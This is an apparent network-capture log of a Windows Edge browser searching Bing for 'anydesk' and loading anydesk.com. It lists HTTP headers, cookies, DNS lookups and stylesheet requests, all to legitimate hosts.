_RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:07:42.8178002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=9&RB=0&GB=0&RG=200&RP=6

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:43 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.87777b5c.1728144463.8fa72be
GET

https://www.bing.com/ck/a?!&&p=a25e0edae602c85aJmltdHM9MTcyODA4NjQwMCZpZ3VpZD0wNTg3OWFkZC0zZWY4LTZkNTQtMGY1OC04ZmQyM2ZkYjZjNzgmaW5zaWQ9NTEzMg&ptn=3&ver=2&hsh=3&fclid=05879add-3ef8-6d54-0f58-8fd23fdb6c78&psq=anydesk&u=a1aHR0cHM6Ly93d3cuYW55ZGVzay5jb20vIzp-OnRleHQ9RGlzY292ZXIgQW55RGVzaywgdGhlIHNlY3VyZSAmIGludHVpdGl2ZSByZW1vdGUgZGVza3RvcCBzb2Z0d2FyZSwgYW5k&ntb=1

msedge.exe

Remote address:

92.123.128.132:443

Request

GET /ck/a?!&&p=a25e0edae602c85aJmltdHM9MTcyODA4NjQwMCZpZ3VpZD0wNTg3OWFkZC0zZWY4LTZkNTQtMGY1OC04ZmQyM2ZkYjZjNzgmaW5zaWQ9NTEzMg&ptn=3&ver=2&hsh=3&fclid=05879add-3ef8-6d54-0f58-8fd23fdb6c78&psq=anydesk&u=a1aHR0cHM6Ly93d3cuYW55ZGVzay5jb20vIzp-OnRleHQ9RGlzY292ZXIgQW55RGVzaywgdGhlIHNlY3VyZSAmIGludHVpdGl2ZSByZW1vdGUgZGVza3RvcCBzb2Z0d2FyZSwgYW5k&ntb=1 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
ect: 4g
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model: ""
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHS=PC=U531; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; _C_ETH=1; USRLOC=HS=1&BLOCK=TS=241005160742; _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:07:42.8178002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=9&RB=0&GB=0&RG=200&RP=6

Response

HTTP/1.1 200 OK

Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1339
Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
X-MSEdge-Ref: Ref A: 438779BBA6B04E21ACA402567C7B4E31 Ref B: LON601060107040 Ref C: 2024-10-05T16:07:44Z
Date: Sat, 05 Oct 2024 16:07:44 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.87777b5c.1728144464.8fa77cc
GET

https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.BM%22,%22FID%22:%22CI%22,%22Name%22:%22HV%22}]

msedge.exe

Remote address:

92.123.128.132:443

Request

GET /fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.BM%22,%22FID%22:%22CI%22,%22Name%22:%22HV%22}] HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHS=PC=U531; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:51.3048865+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=6&RB=0&GB=0&RG=200&RP=3; USRLOC=HS=1&BLOCK=TS=241005160551; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:42 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.8b777b5c.1728144462.134bfe27
GET

https://www.bing.com/fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144461369%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D

msedge.exe

Remote address:

92.123.128.132:443

Request

GET /fd/ls/l?IG=4B36F2F1B3E84114BE48F204E3D5D175&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.DevLoc%22%2C%22TS%22%3A1728144461369%2C%22Name%22%3A%22tryBlock%22%2C%22FID%22%3A%22AutoPrompt%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHS=PC=U531; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; _C_ETH=1; USRLOC=HS=1&BLOCK=TS=241005160742; _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:07:42.8178002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=9&RB=0&GB=0&RG=200&RP=6

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:43 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.8b777b5c.1728144463.134bff02
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.132:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 287
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=anydesk&cvid=022a575194584b82b44d42fc59134688&aqs=edge.1.69i57j0l6.6283j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHS=PC=U531; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _Rwho=u=d&ts=2024-10-05; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; MSPTC=b6eLkMzgX6vUBADe5_dbMOA7XOsbXjklJrcJCzsPt-o; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XO4t4kqSAQAAJclvXRltmwCaFLwVTqNcCA65ZTSmNCONdAH57EOfdN5FxowCNGZORUWh8nUtE9MT8y7wHG9iTPfJZLcHHf5KrQSgTzzyvy3cQue4qMJ+RwKfzS67I4Z8qGxqHHF21UvheBc426rz1Gnov2O7DtSxW6qudY4sbLDOJKYFl8TCGWqZeOkoU3qSLF8xaWbSYGnCcoHZR54kvlgbRTDfxzcbWh/e/6iuPnqCWIC7SoNWBg==~1; SRCHHPGUSR=SRCHLANG=en&HV=1728144461&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=1890&DPR=1.0&UTC=0&PV=10.0&WTS=63863741149; _C_ETH=1; USRLOC=HS=1&BLOCK=TS=241005160742; _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:07:42.8178002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=9&RB=0&GB=0&RG=200&RP=6

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:07:44 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.8b777b5c.1728144464.134c03fc
DNS

146.128.123.92.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.128.123.92.in-addr.arpa

IN PTR

Response

146.128.123.92.in-addr.arpa

IN PTR

a92-123-128-146deploystaticakamaitechnologiescom
DNS

www.anydesk.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.anydesk.com

IN A

Response

www.anydesk.com

IN A

18.66.248.51

www.anydesk.com

IN A

18.66.248.79

www.anydesk.com

IN A

18.66.248.25

www.anydesk.com

IN A

18.66.248.74
DNS

www.anydesk.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.anydesk.com

IN A

Response

www.anydesk.com

IN A

18.66.248.51

www.anydesk.com

IN A

18.66.248.74

www.anydesk.com

IN A

18.66.248.79

www.anydesk.com

IN A

18.66.248.25
GET

https://www.anydesk.com/

msedge.exe

Remote address:

18.66.248.51:443

Request

GET / HTTP/2.0
host: www.anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: document
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 302

content-length: 0
location: https://anydesk.com/en
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: Rq9Llyf2PaDiQCYENdgywHBDHr65DWIqWtvK4iDM1F5kVl02Hf0VYw==
age: 61625
GET

https://anydesk.com/en

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /en HTTP/2.0
host: anydesk.com
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: document
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

content-type: text/html;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:14 GMT
cache-control: max-age=86400
set-cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D; Path=/; Secure; HttpOnly
content-language: en-NL
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: F2vIeSIHpNmsh1czxzWd1cnu9SlQOyp-61vdgcCJLC37Mtnfl-W1Ng==
age: 61652
GET

https://anydesk.com/_static/css/anydesk.min-5cb24b.css

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/css/anydesk.min-5cb24b.css HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: text/css;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 5gtNJn5CHnmHCwdRjrNJDVJZ3mY1dtrwyaSCyz-CcE2qbqAwllaovA==
age: 61627
GET

https://anydesk.com/_static/video-js/video-js.min-3b9d55.css

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/video-js/video-js.min-3b9d55.css HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: text/css;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 3MPoXYP1AtG06o85ScNKpSNMrBm7ADPczFS4mwemMcDULssCnZ4bIw==
age: 61627
GET

https://anydesk.com/_static/css/slick/slick.min-e6e4f1.css

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/css/slick/slick.min-e6e4f1.css HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: text/css;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: iJ-64-U_gBnu95woDihsTsU4_It7an7atf9cS5DXzER3NJeGPR2vRg==
age: 61627
GET

https://anydesk.com/_static/css/slick/slick-theme.min-7c2e6e.css

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/css/slick/slick-theme.min-7c2e6e.css HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: text/css;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
